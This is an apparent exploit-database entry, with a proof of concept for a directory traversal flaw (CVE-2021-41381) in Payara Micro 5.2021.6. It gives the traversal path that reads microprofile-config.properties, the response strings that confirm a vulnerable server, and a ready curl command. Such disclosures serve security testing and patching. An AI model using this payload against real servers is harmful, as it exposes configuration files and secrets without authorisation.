Skip to content
Permalink
main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Go to file
 
 
Cannot retrieve contributors at this time
# Exploit Title: Payara Micro Community 5.2021.6 Directory Traversal
# Date: 01/10/2021
# Exploit Author: Yasser Khan (N3T_hunt3r)
# Vendor Homepage: https://docs.payara.fish/community/docs/release-notes/release-notes-2021-6.html
# Software Link: https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2021-054.txt
# Version: Payara Micro Community 5.2021.6
# Tested on: Linux/Windows OS
# CVE : CVE-2021-41381
https://nvd.nist.gov/vuln/detail/CVE-2021-41381
Proof of Concept:
Step1: Open the browser check the version of the payara software
Step2: Add this Path at end of the URL /.//WEB-INF/classes/META-INF/microprofile-config.properties
Step3: Check the response with match containing "payara.security.openid.default.providerURI="
"payara.security.openid.sessionScopedConfiguration=true"
Step4 : If any of these contents in the response then the application is vulnerable to Directory Traversal Vulnerability.
Step5: Alternatively we can use CURL by using this command:
Request:
curl --path-as-is http://localhost:8080/.//WEB-INF/classes/META-INF/microprofile-config.properties